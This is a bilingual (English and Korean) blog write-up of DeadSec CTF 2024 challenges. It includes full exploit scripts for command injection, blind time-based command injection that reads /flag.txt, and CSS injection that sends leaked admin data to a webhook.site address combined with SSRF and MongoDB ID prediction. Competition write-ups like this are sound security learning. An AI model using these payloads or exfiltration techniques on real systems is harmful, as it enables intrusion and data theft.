2211 words
11 minutes
DeadSec CTF 2024 Writeup
Table of contents
Web
Ping2 (100pt, 140solves)
info
- keywords:
command injection
from requests import * url = 'https://a71dea2b2f9779381f8964e8.deadsec.quest' res = post(url+'/bing.php', data={'Submit': True, 'ip': '223.130.192.248;cacatt${IFS}/flaflagg.txt'}) print(res.text)
DEAD{5b814948-3153-4dd5-a3ac-bc1ec706d766}
bing_revenge (100pt, 84solves)
info
- keywords:
blind command injection,time-based
from time import time from requests import * import string from tqdm import tqdm url = 'https://c15b1a06903d4b9345738ae8.deadsec.quest' flagString = string.digits+'abcdef'+'-' # I first tried with string.printable flag = 'DEAD{f93efeba-0d78-4130-9114-783f2cd337e3}' for i in range(len(flag), 100): for j in tqdm(flagString): start = time() res = post(url+'/flag', data={'host':f'''/dev/null;python -c "__import__('time').sleep(10) if open('/flag.txt').read()[{i}] == '{j}' else None"'''}) if time() - start > 10: print('Found:', flag+j) flag += j break
DEAD{f93efeba-0d78-4130-9114-783f2cd337e3}
Colorful Board (360pt, 15solves, 🩸firstblood)
info
- keywords:
css injection,ssrf,mongodb id prediection
Yay! I first-blooded CTF challenge for the first time in my life.
Analysis & Exploit
this challenge consists Nest.js and mongodb. First, I search a flag in the app.
const init_db = async () => { await db.users.insertMany([ { username: "DEAD{THIS_IS_", password: "dummy", personalColor: "#000000", isAdmin: true }, ]); await delay(randomDelay()); await db.notices.insertOne({ title: "asdf", content: "asdf" }); await delay(randomDelay()); await db.notices.insertOne({ title: "flag", content: "FAKE_FLAG}" }); await delay(randomDelay()); await db.notices.insertOne({ title: "qwer", content: "qwer" }); }
the flag is devided into two and the first one is Admin’s username and the second one is one of notices. And there is /report route that make a admin visit a url. (No restrictions on url)
After that, I found this code in post.hbs and post-edit.hbs
<style> .author { color: {{{ author.personalColor }}} } .user { color: {{{ user.personalColor }}} } .edit-button { position: absolute; top: 10px; right: 10px; } </style>
this code is vulnerable to css injection because they using {{{ }}} instead {{ }}. So, we can do css injection by inject some code to author.personalColor or user.personalColor.
Let’s read post.hbs and post-edit.hbs to know attack-vector.
post.hbs
(The css code that came out earlier) ... <body> <div class="container"> <h1>{{post.title}}</h1> <p class="author">Author: {{author.username}}</p> <p class="user">Your account: {{user.username}}</p> {{#if user.isAdmin}} <a href="/post/edit/{{post.id}}" class="button danger">수정</a> {{/if}} <hr> <div class="post-content"> {{post.content}} </div> <a href="/post" class="button">Go to Posts</a> </div> </body>
In post.hbs, there is no attack point to css injection because name of admin is revealed in <p> tag. Nothing that could leak . It is possible this selection innerText of <p> tag.#:~:text={urllib.parse.quote(flag)} but it doesn’t work on this chall.
post-edit.hbs
(The css code that came out earlier) ... <body> <header> <div class="container"> <h1>Colorful Board</h1> <div class="user-info"> {{#if user}} <span class="username">{{user.username}}</span> <a onclick="logout()" class="button">Logout</a> {{/if}} </div> </div> </header> <main> <div class="container"> <h2>Edit Post</h2> <p>Author: <input class="author" type="text" value="{{author.username}}" disabled></p> <p>Your account: <input class="user" type="text" value="{{user.username}}" disabled></p> <div id="new-post"> <div> <label for="title">Title</label> <input type="text" id="title" name="title" value="{{post.title}}" required> </div> <div> <label for="content">Content</label> <textarea id="content" name="content" required>{{post.content}}</textarea> </div> <button id="submit" class="button">Edit</button> </div> </div> </main> (some script) ... </body> </html>
Wow, there is input that shows current username!
<p>Your account: <input class="user" type="text" value="{{user.username}}" disabled></p>
Finally we can do css injection like this code and get first part of flag.
input[class=user][value^="DEAD{....."] { background: url('https://webhook.site/xxxxxxxx'+'?flag='+flag) }
To get second part of flag, we should look at the /admin/notice route.
in admin.controller.ts
@Controller('admin') export class AdminController { constructor( private readonly adminService: AdminService ) { } @Get('/grant') @UseGuards(LocalOnlyGuard) async grantPerm(@Query('username') username: string) { return await this.adminService.authorize(username); } @Get('/notice') @UseGuards(AdminGuard) @Render('notice-main') async renderAllNotice() { const notices = await this.adminService.getAllNotice(); return { notices: notices.filter(notice => !notice.title.includes("flag")) }; } @Get('/report') async test(@Query('url') url: string) { await this.adminService.viewUrl(url); return { status: 200, message: 'Reported.' }; } @Get('/notice/:id') @UseGuards(AdminGuard) @Render('notice') async renderNotice(@Param('id') id: Types.ObjectId) { const notice = await this.adminService.getNotice(id); return { notice: notice }; } }
To access /admin/notice, you need to get admin. Hmm…
Let’s read LocalOnlyGuard in /admin/grant.
@Injectable() export class LocalOnlyGuard implements CanActivate { canActivate( context: ExecutionContext, ): boolean | Promise<boolean> | Observable<boolean> { const req = context.switchToHttp().getRequest(); const clientIp = req.ip; const localIps = ['127.0.0.1', '::1', '::ffff:127.0.0.1']; if (localIps.includes(clientIp)) { return true; } else { throw new HttpException('Only Local!', 404); } } }
Oh! This code only checks wheter access ip is localhost. Even this /admin/grant route is GET!!! So, we can use SSRF to grant our account by report function.
After you are granted, /admin/notice shows only two notice because flag notice is filtered.
@Get('/notice') @UseGuards(AdminGuard) @Render('notice-main') async renderAllNotice() { const notices = await this.adminService.getAllNotice(); return { notices: notices.filter(notice => !notice.title.includes("flag")) }; }
id of first report (asdf) was 66a48616b3027e48519f2d68
id of sencond report (qwer) was 66a4861db3027e48519f2d6a
mongodb’s id is predictable because of this logic.
so, id of flag report may be 66a4861{7-c}b3027e48519f2d69
Exploit Code
import string from requests import * from tqdm import tqdm url = 'https://2f64abf33c9e01b82242cf14.deadsec.quest' flagString = ' _}'+string.ascii_letters+string.digits eq = 5 def split_string_equally(s, n): length = len(s) part_size = length // n remainder = length % n parts = [] start = 0 for i in range(n): end = start + part_size + (1 if i < remainder else 0) parts.append(s[start:end]) start = end return parts def makeCSS(flag, n): css = '' print(split_string_equally(flagString, eq)[n]) for i in split_string_equally(flagString, eq)[n]: css += 'input[class=user][value^="'+flag+i+'"]{background: url(\'https://webhook.site/7c6f98ef-02a0-4d77-86ba-be115fb8ed15?flag='+flag+i+'\');}\n''' print(css) return css flag = 'DEAD{Enj0y_y0ur_' for i in tqdm(range(len(flag), 30)): for j in range(eq): print(f'{j}exon{i}') post(url+'/auth/register', json={'username': f'{j}exon{i}', 'password': 'exon','personalColor': '''#000000}\n''' + makeCSS(flag, j) + 'test {\n'}) s = Session() res = s.post(url+'/auth/login', json={'username': f'{j}exon{i}', 'password': 'exon'}) s.cookies['accessToken'] = res.json()['accessToken'] res = s.post(url+'/post/write', json={'content': 'test', 'title': 'test'}) res = s.get(url+'/post/all') print(res.text) postId = res.json()[0]['_id'] print(postId) res = s.get(url+'/admin/report?url=http://localhost:1337/post/edit/'+postId) print(res.text) a = input() flag += a post(url+'/auth/register', json={'username': 'exon', 'password': 'exon','personalColor': '''#000000}\n input{background: url('http://localhost:1337/admin/grant?username=exon');}\n test {\n'''}) s = Session() res = s.post(url+'/auth/login', json={'username': 'exon', 'password': 'exon'}) s.cookies['accessToken'] = res.json()['accessToken'] res = s.post(url+'/post/write', json={'content': 'test', 'title': 'test'}) res = s.get(url+'/post/all') print(res.text) postId = res.json()[0]['_id'] print(postId) res = s.get(url+'/admin/report?url=http://localhost:1337/post/edit/'+postId) print(res.text) # 66a48616b3027e48519f2d68 # 66a48616b3027e48519f2d69 # 66a4861db3027e48519f2d6a # hand brute-force
FLAG: DEAD{Enj0y_y0ur_c010rful_w3b_with_c55}
Misc
Mic check (100pt, 264solves, 🩸firstblood)
info
- keywords:
auto
from pwn import * # Connect to the remote server p = remote('35.224.190.229', 30827) for i in range(100): p.recvuntil('mic test > ') a = p.recvuntil(b' [').decode().split(' [')[0] print(a) p.sendline(a) p.interactive()
Korean
Table of contents
Web
Ping2 (100pt, 140solves)
info
- keywords:
command injection
from requests import * url = 'https://a71dea2b2f9779381f8964e8.deadsec.quest' res = post(url+'/bing.php', data={'Submit': True, 'ip': '223.130.192.248;cacatt${IFS}/flaflagg.txt'}) print(res.text)
DEAD{5b814948-3153-4dd5-a3ac-bc1ec706d766}
bing_revenge (100pt, 84solves)
info
- keywords:
blind command injection,time-based
from time import time from requests import * import string from tqdm import tqdm url = 'https://c15b1a06903d4b9345738ae8.deadsec.quest' flagString = string.digits+'abcdef'+'-' # I first tried with string.printable flag = 'DEAD{f93efeba-0d78-4130-9114-783f2cd337e3}' for i in range(len(flag), 100): for j in tqdm(flagString): start = time() res = post(url+'/flag', data={'host':f'''/dev/null;python -c "__import__('time').sleep(10) if open('/flag.txt').read()[{i}] == '{j}' else None"'''}) if time() - start > 10: print('Found:', flag+j) flag += j break
DEAD{f93efeba-0d78-4130-9114-783f2cd337e3}
Colorful Board (360pt, 15solves, 🩸firstblood)
info
- keywords:
css injection,ssrf,mongodb id prediection
내 인생 처음으로 CTF에서 퍼스트 블러드했다.
Analysis & Exploit
Nest.js와 mongodb로 구성되어 있는 문제이다. 먼저 플래그를 검색해 역으로 분석을 시작했다.
const init_db = async () => { await db.users.insertMany([ { username: "DEAD{THIS_IS_", password: "dummy", personalColor: "#000000", isAdmin: true }, ]); await delay(randomDelay()); await db.notices.insertOne({ title: "asdf", content: "asdf" }); await delay(randomDelay()); await db.notices.insertOne({ title: "flag", content: "FAKE_FLAG}" }); await delay(randomDelay()); await db.notices.insertOne({ title: "qwer", content: "qwer" }); }
플래그가 반쪽 두개로 나뉘어 하나는 어드민의 이름으로, 다른 하나는 공지의 내용으로 나뉘어졌다. 그리고 /report 루트로 어드민을 url에 접속시킬 수 있다. (참고로 url에 대한 제한은 전혀 없다.)
그러고 나서 post.hbs와 post-edit.hbs를 봤다.
<style> .author { color: {{{ author.personalColor }}} } .user { color: {{{ user.personalColor }}} } .edit-button { position: absolute; top: 10px; right: 10px; } </style>
이 코드는 {{ }} 대신 {{{ }}}를 써서 css injection이 가능하다. 즉 author.personalColor 또는 user.personalColor를 css에 주입시켜서 css injection을 발생시킬 수 있다. 더 자세한 공격 벡터를 찾기 위해 post.hbs와 post-edit.hbs를 봐보자.
post.hbs
(The css code that came out earlier) ... <body> <div class="container"> <h1>{{post.title}}</h1> <p class="author">Author: {{author.username}}</p> <p class="user">Your account: {{user.username}}</p> {{#if user.isAdmin}} <a href="/post/edit/{{post.id}}" class="button danger">수정</a> {{/if}} <hr> <div class="post-content"> {{post.content}} </div> <a href="/post" class="button">Go to Posts</a> </div> </body>
post.hbs에서는 admin 이름이 노출된 곳이 <p> 태그 밖에 없다. p 태그의 innerText를 css injection 하는 것은 불가능하다.고 생각했는데#:~:text={urllib.parse.quote(flag)} 이런 형식으로 가능하다. 하지만 이 문제에서는 작동되지 않는다고 한다. (본인은 직접 안해봄)
post-edit.hbs
(The css code that came out earlier) ... <body> <header> <div class="container"> <h1>Colorful Board</h1> <div class="user-info"> {{#if user}} <span class="username">{{user.username}}</span> <a onclick="logout()" class="button">Logout</a> {{/if}} </div> </div> </header> <main> <div class="container"> <h2>Edit Post</h2> <p>Author: <input class="author" type="text" value="{{author.username}}" disabled></p> <p>Your account: <input class="user" type="text" value="{{user.username}}" disabled></p> <div id="new-post"> <div> <label for="title">Title</label> <input type="text" id="title" name="title" value="{{post.title}}" required> </div> <div> <label for="content">Content</label> <textarea id="content" name="content" required>{{post.content}}</textarea> </div> <button id="submit" class="button">Edit</button> </div> </div> </main> (some script) ... </body> </html>
이번엔 현재 유저이름을 알려주는 input이 있다!
<p>Your account: <input class="user" type="text" value="{{user.username}}" disabled></p>
드디어 css injection을 하고 flag의 첫부분을 알 수 있다.
input[class=user][value^="DEAD{....."] { background: url('https://webhook.site/xxxxxxxx'+'?flag='+flag) }
이제 플래그의 두번째 부분을 알게 위해 /admin/notice 엔드포인트를 봐보자
in admin.controller.ts
@Controller('admin') export class AdminController { constructor( private readonly adminService: AdminService ) { } @Get('/grant') @UseGuards(LocalOnlyGuard) async grantPerm(@Query('username') username: string) { return await this.adminService.authorize(username); } @Get('/notice') @UseGuards(AdminGuard) @Render('notice-main') async renderAllNotice() { const notices = await this.adminService.getAllNotice(); return { notices: notices.filter(notice => !notice.title.includes("flag")) }; } @Get('/report') async test(@Query('url') url: string) { await this.adminService.viewUrl(url); return { status: 200, message: 'Reported.' }; } @Get('/notice/:id') @UseGuards(AdminGuard) @Render('notice') async renderNotice(@Param('id') id: Types.ObjectId) { const notice = await this.adminService.getNotice(id); return { notice: notice }; } }
/admin/notice에 접근하기 위해 admin 권한이 필요하다…흠..
유저의 권한을 높이는 /admin/grant를 사용하기 위해 LocalOnlyGuard를 읽어보자
@Injectable() export class LocalOnlyGuard implements CanActivate { canActivate( context: ExecutionContext, ): boolean | Promise<boolean> | Observable<boolean> { const req = context.switchToHttp().getRequest(); const clientIp = req.ip; const localIps = ['127.0.0.1', '::1', '::ffff:127.0.0.1']; if (localIps.includes(clientIp)) { return true; } else { throw new HttpException('Only Local!', 404); } } }
이 코드는 접근된 ip가 로컬호스트인지만 확인한다. 심지어 /admin/grant에 접근하는 method는 GET이다!! 즉 /report 를 사용하여 SSRF를 진행해 우리의 계정을 admin 권한으로 높일 수 있다.
어드민 권한을 얻으면, /admin/notice는 오직 두 개의 notice만 보여준다. 왜냐면 아래 코드에서 flag가 들어간 notice를 필터링하기 때문이다.
@Get('/notice') @UseGuards(AdminGuard) @Render('notice-main') async renderAllNotice() { const notices = await this.adminService.getAllNotice(); return { notices: notices.filter(notice => !notice.title.includes("flag")) }; }
첫 report (asdf)의 id: 66a48616b3027e48519f2d68
두번째 report (qwer)의 id: 66a4861db3027e48519f2d6a
mongodb의 id는 다음과 같은 로직으로 생성되기 때문에 예측이 가능하다. 그러므로 flag report의 id는 66a4861{7-c}b3027e48519f2d69 중 하나이다.
Exploit Code
import string from requests import * from tqdm import tqdm url = 'https://2f64abf33c9e01b82242cf14.deadsec.quest' flagString = ' _}'+string.ascii_letters+string.digits eq = 5 def split_string_equally(s, n): length = len(s) part_size = length // n remainder = length % n parts = [] start = 0 for i in range(n): end = start + part_size + (1 if i < remainder else 0) parts.append(s[start:end]) start = end return parts def makeCSS(flag, n): css = '' print(split_string_equally(flagString, eq)[n]) for i in split_string_equally(flagString, eq)[n]: css += 'input[class=user][value^="'+flag+i+'"]{background: url(\'https://webhook.site/7c6f98ef-02a0-4d77-86ba-be115fb8ed15?flag='+flag+i+'\');}\n''' print(css) return css flag = 'DEAD{Enj0y_y0ur_' for i in tqdm(range(len(flag), 30)): for j in range(eq): print(f'{j}exon{i}') post(url+'/auth/register', json={'username': f'{j}exon{i}', 'password': 'exon','personalColor': '''#000000}\n''' + makeCSS(flag, j) + 'test {\n'}) s = Session() res = s.post(url+'/auth/login', json={'username': f'{j}exon{i}', 'password': 'exon'}) s.cookies['accessToken'] = res.json()['accessToken'] res = s.post(url+'/post/write', json={'content': 'test', 'title': 'test'}) res = s.get(url+'/post/all') print(res.text) postId = res.json()[0]['_id'] print(postId) res = s.get(url+'/admin/report?url=http://localhost:1337/post/edit/'+postId) print(res.text) a = input() flag += a post(url+'/auth/register', json={'username': 'exon', 'password': 'exon','personalColor': '''#000000}\n input{background: url('http://localhost:1337/admin/grant?username=exon');}\n test {\n'''}) s = Session() res = s.post(url+'/auth/login', json={'username': 'exon', 'password': 'exon'}) s.cookies['accessToken'] = res.json()['accessToken'] res = s.post(url+'/post/write', json={'content': 'test', 'title': 'test'}) res = s.get(url+'/post/all') print(res.text) postId = res.json()[0]['_id'] print(postId) res = s.get(url+'/admin/report?url=http://localhost:1337/post/edit/'+postId) print(res.text) # 66a48616b3027e48519f2d68 # 66a48616b3027e48519f2d69 # 66a4861db3027e48519f2d6a # hand brute-force
FLAG: DEAD{Enj0y_y0ur_c010rful_w3b_with_c55}
Misc
Mic check (100pt, 264solves, 🩸firstblood)
info
- keywords:
auto
from pwn import * # Connect to the remote server p = remote('35.224.190.229', 30827) for i in range(100): p.recvuntil('mic test > ') a = p.recvuntil(b' [').decode().split(' [')[0] print(a) p.sendline(a) p.interactive()
DeadSec CTF 2024 Writeup
https://blog.exon.kr/posts/ctf/2024/deadsec/